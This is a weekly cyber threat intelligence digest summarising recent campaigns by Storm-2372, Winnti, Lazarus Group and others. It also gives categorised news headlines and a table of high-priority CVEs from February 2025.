Russian threat actors use device code phishing to gain access to Microsoft accounts
Microsoft researchers observed an ongoing campaign, attributed to the suspected Russian threat actor Storm-2372, targeting governments, non-governmental organisations, and various industries since at least August 2024. The campaign involves the so-called ‘device code phishing’ technique, which tricks users into logging into productivity apps, for threat actors to capture authentication tokens that can be used to access a targeted account. The attackers target potential victims using third-party messaging services like WhatsApp, Signal, and Microsoft Teams, by posing as a prominent individual. The attacker then sends invitations to online events or meetings via phishing emails that ask the user to complete a device code authentication request, giving the attacker access to the victim’s account and enabling Graph API data collection activities such as email harvesting.
Winnti APT targets Japanese organisations with updated version of Winnti malware
In March 2024, LAC Watch researchers observed a campaign, attributed to the Winnti advanced persistent threat (APT) actor, that targeted Japanese organisations in the manufacturing, materials, and energy sectors. The campaign, dubbed RevivalStone, employed a novel version of the Winnti malware that has enhanced capabilities and leverages sophisticated evasion techniques. The campaign typically began with the exploitation of SQL injection vulnerabilities in web-facing enterprise resource planning software. The threat actor also deployed webshells such as China Chopper, Behinder, and ‘sqlmap file uploader’ to gain initial access, perform reconnaissance, harvest credentials, and move laterally.
Lazarus Group uses malicious npm packages to target developers as part of supply chain attack
SecurityScorecard researchers identified a new campaign, dubbed Operation Marstech Mayhem, by the North Korean threat actor, Lazarus Group. The campaign targets developers with malicious npm packages that contain a new advanced implant, dubbed Marstech1. The malware aims to compromise software developers and cryptocurrency wallets. Lazarus Group uses fake GitHub repositories, advertised via LinkedIn and Discord, to host legitimate-looking projects that contain obfuscated JavaScript payloads that serve as a loader. The loader fetches additional payloads based on the victim’s system configuration, with the final payload used to exfiltrate cryptocurrency wallet data and authentication credentials.
Phishing campaign uses fake Microsoft login page to install fake Adobe Drive X app
Cofense researchers discovered a phishing campaign that uses a legitimate Microsoft 365 login page to trick users into installing a malicious ‘Adobe Drive X’ application. The attack begins with a phishing email disguised as an Office 365 password reset request, which contains a link that redirects users to the legitimate Microsoft authentication page. Upon accessing the authentication page, users are asked to enter their credentials and grant permissions to the Adobe Drive X app. If the user clicks the ‘Accept’ option when prompted to install the malicious Adobe application, they are redirected a credential phishing page disguised as a fake Microsoft login page.
Phishing campaign targets Turkish aerospace and defence sectors with Snake Keylogger
Malwation researchers identified a phishing campaign targeting Turkish enterprises in the defence and aerospace sectors with a variant of the Snake Keylogger infostealer. The attackers impersonate Turkish Aerospace Industries to deliver the phishing emails under the guise of contractual agreements. Snake Keylogger uses PowerShell to add itself to the Windows Defender exclusion list and performs anti-virtual machine and other anti-detection techniques. The malware also uses scheduled tasks for auto-execution to harvest sensitive data, such as credentials, cookies, and financial information from a wide range of browsers and email clients. Stolen data is sent through communication channels specified by the threat actor, such as Telegram, Discord, FTP, or SMTP.
Ransomware
#StopRansomware: Ghost (Cring) RansomwareCISA Cybersecurity Advisories – Feb 19 2025Russian CryptoBytes Hackers Target Windows Machines with UxCryptor RansomwareGBHackers On Security – Feb 19 2025Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLockReliaQuest – Feb 18 2025Beware! Fake Outlook Support Calls Leading to Ransomware AttacksGBHackers On Security – Feb 17 2025Investigating Anonymous VPS services used by Ransomware GangsBushidoToken Blog – Feb 14 2025Ransomware Roundup – Lynx Fortinet – Feb 14 2025RansomHub Becomes 2024’s Top Ransomware Group, Hitting 600+ Organizations GloballyThe Hacker News – Feb 14 2025
Financial Services
Multi-Layered Cryptocurrency Fraud: How CryptoGrab Drains Millions Through Scam Websites and PhishingAbnormal Security – Feb 19 2025Zhong Stealer Analysis: New Malware Targeting Fintech and CryptocurrencySiembiot – Feb 19 2025NPM package targeting crypto wallets uses new language to evade detectionSourceCodeRED – Feb 16 2025Hacker leaks account data of 12 million Zacks Investment usersBleeping Computer – Feb 13 2025Magento Credit Card Stealer Disguised in an TagSucuri Blog – Feb 12 2025
Geopolitics
Kimsuky Impersonates the Embassy of Japan in the United StatesScarlet Shark Blog – Feb 19 2025Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal MessengerMandiant.com – Feb 19 2025Philippines reports foreign cyber intrusions targeting intelligence data, but no breachesReuters – Feb 18 2025Pro-Russia collective NoName057(16) launched a new wave of DDoS attacks on Italian sitesSecurity Affairs – Feb 17 2025Ukrainian Intelligence Agency Hacks Russian Oil and Gas Contractor SystemsDefense Post – Feb 13 2025
High Priority Vulnerabilities
| Name | name | Software | Base Score |
Temp Score |
|---|---|---|---|---|
| CVE-2025-0108 | Prisma Access | 9.1 | 7.3 | |
| Related: Recently patched PAN-OS authentication bypass flaw actively exploited | ||||
| CVE-2025-1094 | PostgreSQL | 8.1 | 7.7 | |
| Related: CVE-2025-1094: PostgreSQL psql SQL injection (FIXED) | ||||
| CVE-2024-53704 | SonicOS | 8.2 | 7.0 | |
| Related: Active exploitation attempts of recently patched SonicOS flaw observed | ||||
| CVE-2025-24989 | Power Pages | 8.2 | 7.0 | |
| Related: Microsoft Patches Actively Exploited Power Pages Privilege Escalation Vulnerability | ||||
| CVE-2025-22960 | Maxiva VAXT | 7.3 | 7.1 | |
| Related: Multiple zero-day flaws discovered in GatesAir Maxiva UAXT and VAXT transmitters | ||||